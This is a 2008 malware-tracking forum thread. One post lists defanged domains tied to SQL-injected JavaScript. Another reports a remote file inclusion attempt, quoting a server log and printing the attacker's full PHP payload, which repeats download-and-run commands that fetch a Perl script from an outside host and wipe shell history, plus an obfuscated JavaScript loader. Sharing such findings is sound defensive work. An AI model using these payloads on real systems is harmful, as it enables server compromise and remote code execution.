Malware Domain List

Malware Related => Malicious Domains => Topic started by: YanceySlide on June 02, 2008, 04:27:14 am

Title: SQL Injected jscript sites
Post by: YanceySlide on June 02, 2008, 04:27:14 am
Hi folks,

Still getting settled in here.  Thanks JohnC and sowhat-x for the access.

I've been maintaining a list of sites I've seen that are used in the SQL injections that are injecting jscript:
http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080514

Some are long down, some are quite fresh.  I'll try and update this thread as I add to the list.

Latest:
hxxp://www.redir94.com
hxxp://www.locale48.com
hxxp://www.en-us18.com
hxxp://www.sysid72.com
hxxp://www.libid53.com
hxxp://www.script46.com
hxxp://www.rundll92.com
hxxp://www.logid83.com
Title: Re: SQL Injected jscript sites
Post by: tjs on June 02, 2008, 05:54:24 am
Hi YanceySlide. Welcome to MDL and thanks for the list.

TJS
Title: Re: SQL Injected jscript sites
Post by: MysteryFCM on June 02, 2008, 05:56:39 am
I've just sent the following to the owner and registrar of mgfcompressors.com, due to someone trying to use a couple files on their server, to try and exploit one of my servers;

Code:
Ref: mgfcompressors.com/portal/help/file.txt???

The above is a Perl exploit that is used to exploit other servers. It downloads another file from;

mgfcompressors.com/portal/help/

Which then downloads another encoded script;

mgfcompressors.com/portal/help/aoaqv.js

Which is then used to exploit servers, as shown by the following excerpt from my server logs;

**************************************
BEGIN
**************************************
2008-06-02 00:04:37 192.168.0.20 GET /phpAdsNew/view.inc.php phpAds_path=http://www.mgfcompressors.com/portal/help/file.txt??? 80 - 193.198.217.3 libwww-perl/5.803 - 404 0 0
**************************************
END
**************************************

The IP that attempted the exploit (193.198.217.3), resolves to;

blaz.zsem.hr

Needless to say this exploit failed as I do not run Perl on my servers, and do not permit my servers to download non-authenticated files from unknown sources (and certainly do not allow my servers to run in capacities that would permit them to run non-essential scripts from unknown sources).

Can you cleanup your server please?

Relevant codes (they seem to block subsequent attempts to access the files, so posting here for clarity)

Code:
<title>By zaNga</title>
<h2>PHPESSID56465465421200121242024512878952300564505478693</h2><br><br>END OF BYPASS FILE<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
<?
$url="http://www.mgfcompressors.com/portal/help/";
exec('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
exec('cd /tmp;GET '.$url.'read.txt > read.txt;perl read.txt;rm -f read.txt*;');
exec('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
exec('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');
exec('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
passthru('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
passthru('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
passthru('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');
passthru('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
passthru('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
system('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
system('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
system('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
system('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');
system('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
shell_exec('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
shell_exec('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
shell_exec('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
shell_exec('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');
shell_exec('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
popen('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm read.txt*;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");
popen('cd /tmp;curl -O '.$url.'read.txt; perl read.txt;rm read.txt*;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");
popen('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");
popen('cd /tmp;lynx -source '.$url.'read.txt >read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");
popen('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");
popen('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");
@exec('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
@exec('cd /tmp;GET '.$url.'read.txt > read.txt;perl read.txt;rm -f read.txt*;');
@exec('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
@exec('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');
@exec('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
@passthru('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
@passthru('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
@passthru('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');
@passthru('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
@passthru('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
@system('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
@system('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
@system('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
@system('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');
@system('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
@shell_exec('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
@shell_exec('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
@shell_exec('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
@shell_exec('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');
@shell_exec('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
@popen('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm read.txt*;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");
@popen('cd /tmp;curl -O '.$url.'read.txt; perl read.txt;rm read.txt*;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");
@popen('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");
@popen('cd /tmp;lynx -source '.$url.'read.txt >read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");
@popen('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");
@popen('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");
?>

mgfcompressors.com/portal/help/ loads a script that executes the following (via XMLHTTP). I had problems fully decoding it due to arguments.callee.toString

Code:
var arg="lzchtreg";
function TkPgnCxzu(U){var Be7k="];Ak=tP.c";var sOX="G49SGGR%1SG34";var S="%se71%se2%6T";var s="arguments.calle";var Agzj="Cc%5BCc%6BCc%";var KVB="D%se63%se61%";var mEV="37Cc%3DC";var mn="cS2qjhcS65%hcS";var yv9="){if((q.readySt";var aF7="7spd3B';ev";var gIWK="0Cc%3";var o=";var h='3";var FSa="6ECc%50Cc%47Cc";var wNZb="S9g4%hcS";S+="se7B%se";var OV="1%hcS";var O4R="cS61g4%hc";var RhxD="e(K.replace(/%";var Mjn="S3B%hc";var BGWp="8KQ%1%se48KQ%1";var cEFw="%se68%se28%s";var nM="Cc%7BC";var a="3D%se2";o="i;Thd=Thd%13788"+o;var LT=";var V3L";var Q3Ts="G[RWo";var rbt="5%se25%se35%se";var NYl8="cS2%hcS4";var uG="q19=46";var aY7j="7ACc%4F";var pJA="hcS2%hcS69%";var D="3VlhcS3";KVB+="se78KQ%1";var MO="sA1spd72spd20";var w="ngth;c=c%h.le";var j="4%hcS2%";var ki0n="c%3DCc%57Cc%35";var w7="S42%hcS2E%hc";var Oj3="B.rep";var FA="CsAspd73spd38";var gIg="2r3H74Cc%6ECc%3";var hpMH="se20%se28";var J8="5%se3";gIg+="7Cc%2";var ylP="F%hcS6A%hcS3";var H="BCc%74Cc%6ECc";var fx="3Dspd27spd%C";var tH=";rR=rR+N";var Rr="2ECc%63Cc%6r3";var tpmK="Q%1%se25%";var dlrT="r vO;vO=rR+ykui";var PR="Tse3B%s";var uJ="5%se77%se20";var vXj5="e37%se33%";var cp="pe(q.resp";uJ+="%se58%";var nj="ll);";var m6f="%se25%se";var huhd="S6A%hcS2B%hcS2B";var Qm="VlhcS31%hcS29g";huhd="6F%hc"+huhd;var O1pL="e(Ak);}eva";var tw="e37%se32%s";var x7t8=";l++){";H=ki0n+"Cc%4FCc%2"+H;var O="var Q=64112;var";cEFw+="e65%se2%6Tse7";var fRBA="6C%se";var J="g,'');B=B.";var o3jT="=Thd+b;var K='s";nj="rue);q.send(nu"+nj;var HM="%7Z2r3H6";nM="BCc%2BCc%29"+nM;var Cyq="%5DCc%3BCc%6";var sYp="4%hcSD%hcS42";PR="se2%6"+PR;var Ro="eplace(/SG/g";var MGQ="c%74Cc%6ECc%37";cp="{tP = unesca"+cp;var bzKy="cS3D%hcS6Eg";Agzj="%6ECc%50Cc%47"+Agzj;var N="c%/g,'%').re";var xn5X="DCc%30Cc%";var f="se7B%s";mEV+="c%6ECc%50Cc%47";tpmK="e25%se35%se38K"+tpmK;var So0="{akK();}};q.on";var E="var x";var W="hcS25%hcS";S+="78KQ%1%se";var LCS="c%6BCc%74Cc";var kXe="ape(Qg6M.repla";var c67G="hcS29%hc";var BmE="e71%se3";var kJa="42%hcS2E%";var NlYX="cS21%hcS";var 
fXe=").replace";var GJ="'y%')";aF7="71spd2"+aF7;NYl8+="VlhcS6F%";var dGFN="/g,'%";var DimR="=tn7;Ak=nPG";FSa="Cc%37Cc%3DCc%"+FSa;var ysxS="%6D%6C%32%2E%5";var ps9B="%se7D%s";GJ="lace(/qj/g,"+GJ;m6f="6%se36"+m6f;Mjn=ylP+"D%hcS30%hc"+Mjn;var HDN6="5qjhcS29%";var CA7x="e(/Mm/g,'%";S="%se28%se21"+S;Q3Ts="o];nP"+Q3Ts;var V="61g4%hcS2%hcS4V";FSa+="%5BCc%6B";var lp="%se48%se7";Rr+="H61Cc%7Z43C";var CLN="%se63%se61%se7";sYp="5qjhcS29%hcS3Bg"+sYp;var yci=")^Ak;SX+=St";var zTf="hcS6D%hcS4VlhcS";OV="%hcS3"+OV;var cMD4="1%hcS4qjhcS";Oj3="l(unescape(c"+Oj3;Be7k+="harCodeAt(x6"+yci;var Fv="(nY);}catch";FSa="Cc%74Cc%6E"+FSa;var O9e="Cc%74Cc%6";m6f+="37%se";var AYO="4qjhcS2B%";E+="6;var Ak;for(";mn="%hcS4%h"+mn;ysxS="4D%73%78"+ysxS;var m="8KQ%1%se28";bzKy+="4%hcS";var X76="R%4SG3BSG72SG52";var c6ED="%6ECc%37C";FSa+="Cc%74Cc%7A";var T="C';var b=70";var ZDZQ="c%6BCc%74Cc%7";var ID="6ECc%67Cc";var G="8spd78spd";gIg+="9Cc%3BCc%74";gIg+="Cc%6ECc%"+mEV;var L5XO="Q%1%se43%se25";fx=MO+"spd72spd52spd"+fx;var w31=";var W5O=0;var ";var XY="RWo=RWo+";var A="8KQ%1%se2";var PG="HZe;c=";nj="en('GET',zqj,t"+nj;var O2mU="Tse76%";s+="e.toString();";var bru="%hcS2%";x7t8="(l=0;l<256"+x7t8;rbt="se32%se4"+rbt;s+="B=B.re";var iz="%se25%se36%";var v4m="FCc%3DCc%";var lF="GUR=VxEJ;va";kJa="hcS3D%hcS"+kJa;Q3Ts="tn7=nPG[RW"+Q3Ts;hpMH+="%se21";lF+="r f2QH='';";var LDuA="cS67g4%h";var sxvb="S61g4%hcS2";CA7x+="')));"+E;var feGD="lhcS6F%hcS64%h";w31+="Qg6M='Cc%76Cc%6";var cmd="cS6A%hcS25";var bS="escape(LV);";V=zTf+"6qjhcS"+V;Oj3="7D';eva"+Oj3;var dx="VxEJ=U;nPG=new ";var tgR="52%se";gIg+="Cc%5BCc%6BCc%";var wd="var Thd;Thd=3";var onet="ce(/g4%/g,'%7')";PR="e41%se72%se52%"+PR;var YtG="S66g4%hcS2%hcS6";yv9+="ate==4)&&(q.st";var mQa="se71%se";ysxS+="8%4D%4C%48%54%";var Yi="%se6E%se4F%s";aY7j="%6BCc%74Cc%"+aY7j;CLN+="8KQ%1%se63";Fv="bject"+Fv;kXe=xn5X+"3B';eval(unesc"+kXe;a+="7%se25";lF+="var g";GJ="cape(c2.rep"+GJ;huhd+="%hcS29g4%hcSB%";AYO+="hcS3D%";var 
aGb="unescape(vuL.r";CA7x="').replac"+CA7x;c6ED+="c%3BCc%6";var Z="cFCs';ykui=yku";ZDZQ="3Z35Cc%36Cc%3BC"+ZDZQ;x7t8="var B;for"+x7t8;nM=ZDZQ+"ACc%4FCc%2"+nM;O9e+="ECc%37Cc";var P="ce(/%6T/g,'9%'";ysxS+="54%50';var cB=";var fh="73%se6";MGQ+="Cc%3B";var ggTy="ABspd75sp";Q3Ts="hBIs%256;"+Q3Ts;var R="6%hcS2qjhcS65%h";var kyf="se20%se41%se";O9e+="%3BCc%7DCc";DimR+="[RWo]+nPG";L5XO+="%se38KQ";sOX+="SG27SG";hpMH+="%se71%se2%6T"+f;var y="se72%se7%6T";bru+="hcS6F%"+V;HDN6+="hcS3B%h"+LDuA;Qm+="4%hcSB%hcS66%";c67G=mn+"6F%hcS6A%"+c67G;yv9+="atus==";fx="Bspd7%CsAspd%C"+fx;var gk2="28%se65%se2%6T";RhxD+="CsA/g,'6').rep";var YTb="hcS66%hcS";vXj5="se46%se25%s"+vXj5;w+="ngth;var "+dx;var gO="l}}var zqj=iGUR";var lrv="20MZ53MZ";CLN+="%se68%se"+gk2;var Li="44spd27spd3Bspd";LCS+="%7ACc";Cyq+="ECc%50Cc%4";DimR="[hBIs]"+DimR;var Ft=",'2%').repl";P="/g,'b').repla"+P;yv9+="200))"+So0;PG+="c+rR.length;c=c";aGb=sOX+"3B';eval("+aGb;w31+="1Cc%7Z";var YsrI="S67g4%hc";Q3Ts+="]=nPG[";gIWK+="Z35Cc%36Cc%3B"+FSa;O9e="c%4FCc%5DCc%3D"+O9e;X76+="SG2BSG3DS";var xZW1="place(/Z";var KxMe="B%se71%s";DimR+="[hBIs];Ak=Ak%2";Ro+=",'%')));var "+uG;o=wd+"5861;var yku"+o;iz+="se3%6Tse25%se3";var ui8="KQ%1%s";Fv="=new ActiveXO"+Fv;cp="unction()"+cp;Mjn="%hcS6"+Mjn;var ULuQ="74Cc%";c67G+="S3B%hcS69%"+YTb;R="hcSD%hcS69%hcS6"+R;Cyq+="7Cc%5BCc";lF+="ysX=18";a="20%se4C%se56%se"+a;CA7x+="x6=0;x6<tP.le";var i1EP="2%se6A%se65";S="e66%se20"+S;BGWp=rbt+"38%se25%se3"+BGWp;fXe="(/Vl/g,'3%'"+fXe;YsrI="cS6E%hc"+YsrI;nj="e=x;q.op"+nj;var n="sA1spd";var pCH5="Cc%5BCc%";NYl8+="hcS64%hcS65%hc";D="hcS3D%hcS3D%hcS"+D;LCS=v4m+"30Cc%3BC"+LCS;var sf="30%se27%se3B";T+="100;var HZ";var gj="6ECc%37Cc%20Cc";Q3Ts="+nPG[RWo];hBIs="+Q3Ts;J+="toUpperCa";T+="e;var N5='bO2";xZW1="escape(V3LR.re"+xZW1;YtG="S2E%hc"+YtG;tH="'%')))"+tH;KxMe=S+"72%se7%6Tse7"+KxMe;FA="spd3%"+FA;i1EP="8%se4F%se6"+i1EP;fXe+="(/%hcS/g,'%')";MGQ="c%4FCc%5DCc%2BC"+MGQ;Ft+="ace(/r3";fRBA="6E%se75%se"+fRBA;LT+="R='MZ68MZ42M";Mjn="2%hcS2qjhcS65"+Mjn;var 
JD6a="se6C%se";Be7k=DimR+"56;Ak=nPG[Ak"+Be7k;Z=Ro+"40;N5+='v47"+Z;sf=tpmK+"se35%se"+sf;HDN6+="cS9g4%hcSVl";lF+="8;var eoj";sYp="4%hcSVlhcS"+sYp;gIWK+="Cc%4FCc%5DCc";MGQ+="Cc%74Cc%6E";Ft=N+"place(/Z/g"+Ft;var i="Dspd%";bzKy=sxvb+"%hcS20g4%hcS1%h"+bzKy;onet=fXe+".repla"+onet;var RLe="/g,'8'";HM+="BCc%74Cc%7ACc%4"+LCS;LT+="Z49MZ73MZ3DM";ysxS="ArR='%"+ysxS;J=s+"place(/\\W/"+J;bS="%')));var nY=un"+bS;X76="SGGR%8SGG"+X76;Mjn+="S65%hcS6F";bS="place(/%se/g,'"+bS;RLe="ce(/y"+RLe;Yi="2%se20"+Yi;O+=" vuL='S";O2mU="78KQ%1%se6%6"+O2mU;i=ggTy+"d%CsA9spd3"+i;var eeF="S6qjhcS3B%hc";OV+="3qjhcS3qjhcS3B";R+="cS6F%h"+cmd;var Zl="g4%hcSVlhcS5qj";ui8=lp+"8KQ%1%se78"+ui8;var ggNn="MZ3B';e";gIWK+="%3BCc"+Agzj;CLN+="se7B%"+mQa;D+="1%hcS29g4%hcSB";NYl8="jhcS61g4%h"+NYl8;AYO="hcS51%hcS"+AYO;dGFN+="3').replace(";YsrI=w7+"S6C%hcS65%h"+YsrI;onet=GJ+".replace"+onet;m="e65%se73%se7"+m;kJa+="hcS6Vlhc";PG="+Q;c=c+"+PG;Q3Ts="6;hBIs=hBIs"+Q3Ts;sf=J8+"5%se38KQ%1%s"+sf;Yi+="e58KQ%1";AYO=D+"%hcS66%hcS32%"+AYO;OV="jhcS3D"+OV;var C="e4F%se58KQ%1%s";FA+="spd27spd3";O2mU+="se65%se5"+i1EP;LT=Ft+"H/g,'8%')))"+LT;sYp="qjhcS67g4%hcS9g"+sYp;BGWp+="%se25%se38K"+L5XO;fh="6E%se65%se"+fh;c67G+="2qjhcS65%hcS6F";Be7k+="ring.f";tH=RhxD+"lace(/spd/g,"+tH;lrv="Z61MZ72MZ"+lrv;cEFw+="B%se71%se3D%se"+fRBA;Z=dGFN+"/GR%/g,'6').r"+Z;onet="';eval(unes"+onet;ID+="%74Cc%6r3H3BCc%"+ULuQ;Z+="i*q19;va"+dlrT;sYp="hcS65%hcS2"+sYp;var hcZq="d2Bspd3Dspd27sp";W+="3VlhcS32%"+AYO;c6ED=w31+"20Cc%74Cc"+c6ED;O=tH+"5;var c=33550;"+O;A=O2mU+"%se63%se7"+A;J+="se();B+=c;var i"+lF;y=hpMH+"e78KQ%1%"+y;fh+="3%se61%s";O=aF7+"al(unescap"+O;R+="%hcS3VlhcS32%h"+NlYX;c6ED+="6Cc%6FCc"+HM;j+="hcS69%hcS6E%";Mjn+="%hcS6A%hcS3C%hc"+YsrI;kJa+="S6qjh"+O4R;O9e=Cyq+"%57Cc%35C"+O9e;C=A+"8%se6E%s"+C;yv9="var x=function("+yv9;Mjn="4%hcS"+Mjn;ysxS=RLe+")));var "+ysxS;sYp+="%hcS3D%hcS66%hc";PG+="%b.le"+w;fh+="e70%se65%se28%s"+PR;O9e+="%5Z57Cc";MGQ+="Cc%37C"+H;onet+=".repla"+ysxS;gIWK=gj+"%25Cc%2"+gIWK;Rr="Cc%4Z"+Rr;var 
iy="67%hcS2";bru+="lhcS6F%hcS64%"+sYp;hcZq=FA+"Bspd%CsA8sp"+hcZq;pCH5+="57Cc%35Cc%4FCc"+O9e;o+="r2PkG2";Oj3=JD6a+"6C%se7D%se"+Oj3;O1pL+="l(SX);};"+yv9;P=Oj3+"lace(/8KQ%"+P;bru+="S32%hcS5"+cMD4;ui8+="e70%se"+tgR;uJ=BmE+"D%se6E%se6"+uJ;bS="b1%/g,'4%').re"+bS;gIg="Cc%74Cc%"+gIg;O+="GGRCSG3DSGGRC";c67G+="%hcS6A%"+W;NYl8="cS4VlhcS6q"+NYl8;O1pL+="readystatechang"+nj;var Rea="51%hcS4qjhcS2B";o3jT+="pd7%CsAspd%C"+n;m+="%se2%6Ts";onet+="'%se76%se61%";LT=kXe+"ce(/C"+LT;Q3Ts=XY+"1;RWo=RWo%25"+Q3Ts;G+="%CsA3spd3Dspd2";aY7j+="Cc%25Cc%4Z2EC";lrv+="58MZ3DMZ27MZ27"+ggNn;CLN+="3D%se6E%se75%"+P;bS=CLN+").replace(/"+bS;nM+="c%74Cc%6";bzKy+="5%hcS6C%hcS6C";ui8+="65%se71%se75%s"+m;gO+=";var akK=f"+cp;Rr+="c%6FCc%64Cc%";bru=iy+"E%hcS66g4"+bru;lrv="BMZ76M"+lrv;Qm=R+"3D%hcS3"+Qm;var Abi="%57Cc%35Cc%4";x7t8=PG+"Array();var l;"+x7t8;vXj5+="se25%se36%se";var ymm="5DCc%3DCc%6";feGD+="cS65%hcS41g4"+c67G;nM+="ECc%37Cc%3DCc"+aY7j;gIWK=Abi+"FCc%3DCc%74Cc%"+gIWK;m6f="5%se3"+m6f;pCH5+="%6FCc%3"+LT;wNZb="7g4%hc"+wNZb;j+="hcS67%hc"+YtG;ymm+="ECc%50Cc%47"+pCH5;o3jT+="72spd20spd7"+G;c6ED=gO+"onseText)"+c6ED;Rr+="65Cc%41"+gIg;huhd=eeF+"S65%hcS"+huhd;fx=i+"CsA2spd3"+fx;fh=Yi+"%se3D%se75%se"+fh;Rea+="%hcS3D%hcS53g4";Rea+="%hcS4g4%"+pJA;Li+="79spd%Cs"+fx;bzKy+="%hcS3B"+onet;Q3Ts+="hBIs];nPG"+Be7k;a+="%se38K";J=x7t8+"nPG[l]=l;}B="+J;nM=c6ED+"%4FCc%3CCc%"+nM;y=sf+"%se6%6Tse66%"+y;NYl8=j+"F%hcS6D%h"+NYl8;wNZb+="VlhcS"+HDN6;kyf="E%se65%se77%"+kyf;hcZq+="d%CsAAspd39spd"+Li;Z+=";rR=xxc+vO;b=N5"+J;wNZb+="hcS5q"+OV;wNZb=NYl8+"S2qjhcS6"+wNZb;xZW1+="/g,'m"+CA7x;uJ=y+"se7B%s"+uJ;tw+="e25%se36%"+vXj5;C=kyf+"63%se"+C;Rr+="74Cc%7AC"+MGQ;uJ+="se4D%se4C"+ui8;aGb=X76+"G27SG45S"+aGb;Qm=wNZb+"g4%hcSDg4%"+Qm;Zl=huhd+"hcS67g4%hcS9"+Zl;ID+="6ECc%37Cc%3D"+Rr;Zl=Mjn+"S4%hc"+Zl;Z=aGb+"eplace(/C"+Z;KVB+="%se63"+cEFw;bru=Rea+"hcS6E%hcS"+bru;C=KxMe+"e3D%se6"+C;iz+="6%se33%se25%s"+tw;gIWK+="74Cc%7ACc%4FCc%"+ymm;Z=O+"SG2BSG54"+Z;ps9B=KVB+"6C%se7D%se3B"+ps9B;BGWp=m6f+"38KQ%1%se25%"+BGWp;Z=hcZq+"sABspd"+Z;ID=nM+"c%6CCc%65Cc%"+ID;feGD=kJa+
"S2%hcS4V"+feGD;T=o+"';h+='Vp"+T;C=fh+"e6%6Ts"+C;Qm+="hcS32%hcS"+bru;Q3Ts+="romCharCod"+O1pL;iz+="46%se2"+BGWp;ID=Fv+"(e){q=nul"+ID;a=bzKy+"se72%se"+a;feGD=Zl+"hcS5E%"+feGD;ID=bS+"if (!q){try{q"+ID;ID+="%37Cc%3BCc"+gIWK;feGD="hcS66%hcS6Fg"+feGD;ID+="Z30MZ3"+lrv;T+="Px';HZe"+o3jT;Z="7%CsA"+Z;xZW1=ID+"val(un"+xZW1;uJ=iz+"%1%se38%se2"+uJ;a+="Q%1%se48KQ%1"+uJ;xZW1=C+"e2%6Tse3B%se7D"+xZW1;Qm+="3Bg4%hcS6%hc"+a;ps9B=Qm+"e3B%se7"+ps9B;ps9B=feGD+"hcS53g4%hcS4g"+ps9B;ps9B+="e76%se61%se7"+xZW1;ps9B+="ngth;x6++){"+Q3Ts;Z=T+"7spd54spd72spd"+Z;Z+=";var c2='%"+ps9B;eval(Z);}TkPgnCxzu(arg);

Partially decoded;

Code:
var Thd;Thd=35861;var ykui;Thd=Thd%13788;var h='3r2PkG2';h+='VpC';var b=70100;var HZe;var N5='bO2Px';HZe=Thd+b;var K='spd7%CsAspd%CsA1spd72spd20spd78spd78spd%CsA3spd3Dspd27spd54spd72spd7%CsAspd3%CsAspd73spd38spd27spd3Bspd%CsA8spd2Bspd3Dspd27spd%CsAAspd39spd44spd27spd3Bspd79spd%CsABspd75spd%CsA9spd3Dspd%CsA2spd3Bspd7%CsAspd%CsA1spd72spd20spd72spd52spd3Dspd27spd%CsABspd71spd27spd3B';eval(unescape(K.replace(/%CsA/g,'6').replace(/spd/g,'%')));rR=rR+N5;var c=33550;var Q=64112;var vuL='SGGRCSG3DSGGRCSG2BSG54SGGR%8SGGR%4SG3BSG72SG52SG2BSG3DSG27SG45SG49SGGR%1SG34SG27SG3B';eval(unescape(vuL.replace(/C/g,'%3').replace(/GR%/g,'6').replace(/SG/g,'%')));var q19=4640;N5+='v47cFCs';ykui=ykui*q19;var vO;vO=rR+ykui;rR=xxc+vO;b=N5+Q;c=c+HZe;c=c+rR.length;c=c%b.length;c=c%h.length;var VxEJ=U;nPG=new Array();var l;var B;for(l=0;l<256;l++){nPG[l]=l;}B=arguments.callee.toString();B=B.replace(/\W/g,'');B=B.toUpperCase();B+=c;var iGUR=VxEJ;var f2QH='';var gysX=188;var eoj;var c2='%hcS66%hcS6Fg4%hcS2%hcS2qjhcS65%hcS6F%hcS6A%hcS3D%hcS30%hcS3B%hcS65%hcS6F%hcS6A%hcS3C%hcS42%hcS2E%hcS6C%hcS65%hcS6E%hcS67g4%hcS4%hcS6qjhcS3B%hcS65%hcS6F%hcS6A%hcS2B%hcS2B%hcS29g4%hcSB%hcS67g4%hcS9g4%hcSVlhcS5qjhcS5E%hcS3D%hcS42%hcS2E%hcS6VlhcS6qjhcS61g4%hcS2%hcS4VlhcS6F%hcS64%hcS65%hcS41g4%hcS4%hcS2qjhcS65%hcS6F%hcS6A%hcS29%hcS3B%hcS69%hcS66%hcS2qjhcS65%hcS6F%hcS6A%hcS25%hcS3VlhcS32%hcS3D%hcS3D%hcS3VlhcS31%hcS29g4%hcSB%hcS66%hcS32%hcS51%hcS4qjhcS2B%hcS3D%hcS53g4%hcS4g4%hcS2%hcS69%hcS6E%hcS67%hcS2E%hcS66g4%hcS2%hcS6F%hcS6D%hcS4VlhcS6qjhcS61g4%hcS2%hcS4VlhcS6F%hcS64%hcS65%hcS2qjhcS67g4%hcS9g4%hcSVlhcS5qjhcS29%hcS3B%hcS67g4%hcS9g4%hcSVlhcS5qjhcS3D%hcS31%hcS3qjhcS3qjhcS3Bg4%hcSDg4%hcSD%hcS69%hcS66%hcS2qjhcS65%hcS6F%hcS6A%hcS25%hcS3VlhcS32%hcS21%hcS3D%hcS3VlhcS31%hcS29g4%hcSB%hcS66%hcS32%hcS51%hcS4qjhcS2B%hcS3D%hcS53g4%hcS4g4%hcS2%hcS69%hcS6E%hcS67%hcS2E%hcS66g4%hcS2%hcS6F%hcS6D%hcS4VlhcS6qjhcS61g4%hcS2%hcS4VlhcS6F%hcS64%hcS65%hcS2qjhcS67g4%hcS9g4%hcSVlhcS5qjhcS29%hcS3Bg4%hcSD%hcS42%hcS3D%hcS66%hcS32%hcS51%hcS4qjhcS3Bg
4%hcS6%hcS61g4%hcS2%hcS20g4%hcS1%hcS3D%hcS6Eg4%hcS5%hcS6C%hcS6C%hcS3B';eval(unescape(c2.replace(/qj/g,'y%').replace(/Vl/g,'3%').replace(/%hcS/g,'%').replace(/g4%/g,'%7').replace(/y/g,'8')));var ArR='%4D%73%78%6D%6C%32%2E%58%4D%4C%48%54%54%50';var cB='%se76%se61%se72%se20%se4C%se56%se3D%se27%se25%se38KQ%1%se48KQ%1%se25%se36%se3%6Tse25%se36%se33%se25%se37%se32%se25%se36%se46%se25%se37%se33%se25%se36%se46%se25%se36%se36%se25%se37%se38KQ%1%se25%se32%se45%se25%se35%se38%se25%se38KQ%1%se48KQ%1%se25%se38KQ%1%se43%se25%se38KQ%1%se38%se25%se35%se38KQ%1%se25%se35%se38KQ%1%se25%se35%se30%se27%se3B%se6%6Tse66%se20%se28%se21%se71%se2%6Tse7B%se78KQ%1%se72%se7%6Tse7B%se71%se3D%se6E%se65%se77%se20%se58%se4D%se4C%se48%se78KQ%1%se78KQ%1%se70%se52%se65%se71%se75%se65%se73%se78KQ%1%se28%se2%6Tse3B%se7D%se63%se61%se78KQ%1%se63%se68%se28%se65%se2%6Tse7B%se71%se3D%se6E%se75%se6C%se6C%se7D%se3B%se7D%se76%se61%se72%se20%se6E%se4F%se58KQ%1%se3D%se75%se6E%se65%se73%se63%se61%se70%se65%se28%se41%se72%se52%se2%6Tse3B%se6%6Tse66%se20%se28%se21%se71%se2%6Tse7B%se78KQ%1%se72%s